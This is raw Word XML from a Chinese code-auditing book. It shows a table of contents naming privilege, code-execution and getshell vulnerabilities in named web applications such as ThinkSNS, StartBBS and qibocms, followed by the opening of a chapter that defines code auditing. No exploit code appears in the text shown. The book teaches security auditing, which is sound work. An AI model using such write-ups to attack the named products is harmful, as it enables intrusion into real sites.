          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
            <w:b/>
          </w:rPr>
          <w:t xml:space="preserve">Tipask </w:t>
        </w:r>
        <w:proofErr w:type="gramStart"/>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
            <w:b/>
          </w:rPr>
          <w:t xml:space="preserve">2.0  </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
            <w:b/>
          </w:rPr>
          <w:t>加密函数破解导致任意用户密码修改</w:t>
        </w:r>
        <w:proofErr w:type="gramEnd"/>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:b/>
          </w:rPr>
          <w:t>..................</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
            <w:b/>
          </w:rPr>
          <w:t>- 143 -</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="106"/>
        <w:ind w:right="425"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_bookmark34" w:history="1">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t>越权访问</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t xml:space="preserve">............................................................................... </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t>- 147 -</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="315" w:lineRule="exact"/>
        <w:ind w:left="657" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_bookmark34" w:history="1">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
            <w:b/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t xml:space="preserve">ThinkSNS </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
            <w:b/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t>水平</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
            <w:b/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t>权</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
            <w:b/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t>限</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
            <w:b/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t>问题</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:b/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t xml:space="preserve">............................................................ </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
            <w:b/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t>- 147 -</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="10"/>
        <w:ind w:left="657" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_bookmark35" w:history="1">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
            <w:b/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t xml:space="preserve">Easytalk </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
            <w:b/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t>垂直</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
            <w:b/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t>权</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
            <w:b/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t>限</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
            <w:b/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t>问题</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:b/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t xml:space="preserve">.............................................................. </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
            <w:b/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t>- 152 -</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="112"/>
        <w:ind w:right="425"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_bookmark36" w:history="1">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t>代码执行</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t xml:space="preserve">............................................................................... </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t>- 156 -</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="315" w:lineRule="exact"/>
        <w:ind w:left="657" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_bookmark36" w:history="1">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
            <w:b/>
          </w:rPr>
          <w:t>初刻</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
            <w:b/>
            <w:spacing w:val="-67"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
            <w:b/>
          </w:rPr>
          <w:t xml:space="preserve">Crucco </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
            <w:b/>
          </w:rPr>
          <w:t>主站任意代码执行</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:b/>
          </w:rPr>
          <w:t xml:space="preserve">........................................... </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
            <w:b/>
          </w:rPr>
          <w:t>- 156 -</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="10"/>
        <w:ind w:left="417" w:right="317" w:firstLine="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_bookmark37" w:history="1">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
            <w:b/>
          </w:rPr>
          <w:t>青云客</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
            <w:b/>
            <w:spacing w:val="-68"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
            <w:b/>
          </w:rPr>
          <w:t xml:space="preserve">CMS </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
            <w:b/>
          </w:rPr>
          <w:t>前台任意代码执行</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:b/>
          </w:rPr>
          <w:t xml:space="preserve">............................................. </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
            <w:b/>
          </w:rPr>
          <w:t>- 157 -</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="161" w:line="240" w:lineRule="auto"/>
        <w:ind w:right="425"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_bookmark38" w:history="1">
        <w:proofErr w:type="gramStart"/>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri"/>
          </w:rPr>
          <w:t>getshell</w:t>
        </w:r>
        <w:proofErr w:type="gramEnd"/>
        <w:r>
          <w:t xml:space="preserve">.................................................................................. </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri"/>
          </w:rPr>
          <w:t>- 162 -</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="45"/>
        <w:ind w:left="657" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_bookmark38" w:history="1">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri"/>
            <w:b/>
          </w:rPr>
          <w:t>ThinkSNS getshell</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman"/>
            <w:b/>
          </w:rPr>
          <w:t>........................</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman"/>
            <w:b/>
          </w:rPr>
          <w:t xml:space="preserve">............................................... </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri"/>
            <w:b/>
          </w:rPr>
          <w:t>- 162 -</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="15"/>
        <w:ind w:left="657" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_bookmark39" w:history="1">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
            <w:b/>
          </w:rPr>
          <w:t>开源</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
            <w:b/>
          </w:rPr>
          <w:t>轻论坛</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
            <w:b/>
            <w:spacing w:val="-62"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
            <w:b/>
          </w:rPr>
          <w:t xml:space="preserve">StartBBS </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
            <w:b/>
          </w:rPr>
          <w:t>前台</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
            <w:b/>
            <w:spacing w:val="-64"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
            <w:b/>
          </w:rPr>
          <w:t>getshell</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:b/>
          </w:rPr>
          <w:t xml:space="preserve">.......................................... </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
            <w:b/>
          </w:rPr>
          <w:t>- 169 -</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="8" w:line="247" w:lineRule="auto"/>
        <w:ind w:left="417" w:right="424" w:firstLine="240"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_bookmark40" w:history="1">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
            <w:b/>
          </w:rPr>
          <w:t>蝉知企</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
            <w:b/>
          </w:rPr>
          <w:t>业门户</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
            <w:b/>
          </w:rPr>
          <w:t>系</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
            <w:b/>
          </w:rPr>
          <w:t>统</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
            <w:b/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
            <w:b/>
          </w:rPr>
          <w:t xml:space="preserve">v2.5 </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
            <w:b/>
          </w:rPr>
          <w:t>前台</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
            <w:b/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
            <w:b/>
          </w:rPr>
          <w:t>getshell</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:b/>
          </w:rPr>
          <w:t>....................................</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
            <w:b/>
          </w:rPr>
          <w:t>- 176 -</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink w:anchor="_bookmark41" w:history="1">
        <w:proofErr w:type="gramStart"/>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
            <w:b/>
          </w:rPr>
          <w:t xml:space="preserve">qibocms  </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
            <w:b/>
          </w:rPr>
          <w:t>分</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
            <w:b/>
          </w:rPr>
          <w:t>类</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
            <w:b/>
          </w:rPr>
          <w:t>系</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
            <w:b/>
          </w:rPr>
          <w:t>统</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
            <w:b/>
          </w:rPr>
          <w:t>最新版</w:t>
        </w:r>
        <w:proofErr w:type="gramEnd"/>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
            <w:b/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
            <w:b/>
          </w:rPr>
          <w:t>前台无限制</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
            <w:b/>
            <w:spacing w:val="-60"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
            <w:b/>
          </w:rPr>
          <w:t>Getshell</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:b/>
          </w:rPr>
          <w:t xml:space="preserve">.................... </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
            <w:b/>
          </w:rPr>
          <w:t>- 179 -</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="106" w:line="336" w:lineRule="exact"/>
        <w:ind w:right="425"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_bookmark42" w:history="1">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t>漏洞组合</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t xml:space="preserve">............................................................................... </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t>- 184 -</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="341" w:lineRule="exact"/>
        <w:ind w:left="657" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_bookmark42" w:history="1">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
            <w:b/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t>骑士漏洞组合可</w:t>
        </w:r>
        <w:proofErr w:type="gramStart"/>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
            <w:b/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t>致所有</w:t>
        </w:r>
        <w:proofErr w:type="gramEnd"/>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
            <w:b/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t>数据泄露</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Angsana New" w:eastAsia="Angsana New"/>
            <w:b/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t>+getshell</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:b/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t xml:space="preserve">.................................. </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
            <w:b/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t>- 184 -</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:spacing w:line="341" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri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1"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri"/>
          <w:b/>
          <w:sz w:val="13"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:line="539" w:lineRule="exact"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="代码审计基础"/>
      <w:bookmarkStart w:id="1" w:name="代码审计概念"/>
      <w:bookmarkStart w:id="2" w:name="_bookmark0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:bookmarkEnd w:id="1"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>代码审计基础</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:b/>
          <w:sz w:val="43"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="2"/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>代码审计概念</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:spacing w:before="1"/>
        <w:ind w:right="451" w:firstLine="420"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>代码审计</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>是对应用程序源代码进行系统性检查的工作。它的目的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>是为了找到并且修复应用程序在开发阶段存在的一些漏洞或者程序</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>逻</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>辑错误</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>避免程序漏洞被非法利用给企业带来不必要的风险。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="45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代码审计不是简单的检查代码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>审计代码的原因是确保代码能安全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的做到对信息和资源进行足够的保护</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>所以熟悉整个应用程序的业务流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程对于</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>控</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>制潜在的风险是非常重要的。</w:t>
      </w:r>
    </w:p>
